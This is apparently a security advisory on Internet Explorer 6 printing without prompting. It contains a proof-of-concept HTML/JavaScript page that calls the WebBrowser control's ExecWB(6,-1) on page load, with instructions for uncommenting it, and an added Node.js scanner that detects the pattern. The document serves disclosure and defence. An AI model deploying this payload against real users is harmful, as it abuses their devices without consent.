‘Internet Explorer Print without Prompting’

Summary

‘Microsoft Internet Explorer is the dominant web browser in the world, used by millions of people. Internet Explorer allows a malicious user to send pages to a connected printer without prompting the user for intervention. The vulnerability can be exploited by using JavaScript, HTML and OLE.’

Credit:

‘The information has been provided by Ben Garvey.’


Details

Vulnerable Systems:
 * Internet Explorer version 6

Using an OLE object, JavaScript, and HTML, a malicious document can make IE 6 send pages to the printer without prompting the user. An example page that exploits the vulnerability is given below. The offending line is commented out and must be uncommented for the page to work, and any line breaks that break the JavaScript code must be removed.

<HTML>
<HEAD>
<SCRIPT language='JavaScript'>
function ieExecWB( intOLEcmd, intOLEparam )
{
        // Create OLE Object
        var WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0
        CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';

        // Place Object on page
        document.body.insertAdjacentHTML('beforeEnd', WebBrowser);

        // if intOLEparam is not defined, set it
        if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || ( intOLEparam > 1) )
                intOLEparam = 1;

        // Execute Object
        WebBrowser1.ExecWB( intOLEcmd, intOLEparam );

        // Destroy Object
        WebBrowser1.outerHTML = "";
}

function printAll()
{
        // Uncomment this to enable the exploit!
        //ieExecWB(6,-1);
}
</SCRIPT>
</HEAD>
<BODY onload='printAll()'>
<h3>I like your PRINTER</h3>
</BODY>
</HTML>
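
A defensive check for the pattern in the listing above, added here as an example and not part of the original advisory: a heuristic Node.js scan that flags pages which reference the WebBrowser control's CLSID and pass command id 6 to ExecWB, either directly or through a wrapper such as ieExecWB. The names findScriptedPrint, callsTo, stripComments and samplePage are assumptions of this example, and the sample input is constructed.

```javascript
// Added example: heuristic static check, not a full JavaScript parser.
const WEBBROWSER_CLSID = /8856F961-340A-11D0-A96B-00C04FD705A2/i; // CLSID from the page
const OLECMDID_PRINT = 6; // command id the page passes to ExecWB
// Drop comments so a disabled call is not reported ("//" after ":" is kept for URLs).
const stripComments = (src) =>
  src.replace(/\/\*[\s\S]*?\*\//g, "").replace(/(^|[^:])\/\/.*$/gm, "$1");
// Argument lists of every call to `name`, skipping its own `function name(...)` definition.
function callsTo(src, name) {
  const re = new RegExp("(?:^|[^\\w$])(function\\s+)?" + name + "\\s*\\(([^()]*)\\)", "g");
  return [...src.matchAll(re)].filter((m) => !m[1]).map((m) => m[2].split(",").map((a) => a.trim()));
}

function findScriptedPrint(html) {
  const src = stripComments(html);
  const findings = [];
  if (!WEBBROWSER_CLSID.test(src)) return findings; // control is never instantiated
  const isPrint = (arg) => Number(arg) === OLECMDID_PRINT;
  // 1. Direct ExecWB calls with a literal command id.
  for (const args of callsTo(src, "ExecWB")) {
    if (isPrint(args[0])) findings.push({ via: "ExecWB", args });
  }
  // 2. Wrappers that forward a parameter to ExecWB, as the page's ieExecWB does.
  const defs = [...src.matchAll(/function\s+(\w+)\s*\(([^)]*)\)/g)];
  defs.forEach((def, i) => {
    const end = i + 1 < defs.length ? defs[i + 1].index : src.length; // body ends at next definition
    const body = src.slice(def.index + def[0].length, end);
    const params = def[2].split(",").map((p) => p.trim());
    for (const inner of callsTo(body, "ExecWB")) {
      const pos = inner[0] ? params.indexOf(inner[0]) : -1;
      if (pos < 0) continue;
      for (const args of callsTo(src, def[1])) {
        if (isPrint(args[pos])) findings.push({ via: def[1], args });
      }
    }
  });
  return findings;
}

// Constructed sample modelled on the page's listing; `active` toggles the print call.
const samplePage = (active) => `<SCRIPT>
function ieExecWB( intOLEcmd, intOLEparam ) {
  var WebBrowser = '<OBJECT ID="WebBrowser1" CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';
  document.body.insertAdjacentHTML('beforeEnd', WebBrowser);
  WebBrowser1.ExecWB( intOLEcmd, intOLEparam );
}
function printAll() {
  ${active ? "" : "//"}ieExecWB(6,-1);
}
</SCRIPT>`;
```

A search for a literal ExecWB(6, ...) alone would miss the listing, because the command id only appears at the wrapper's call site; the second pass covers that case.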
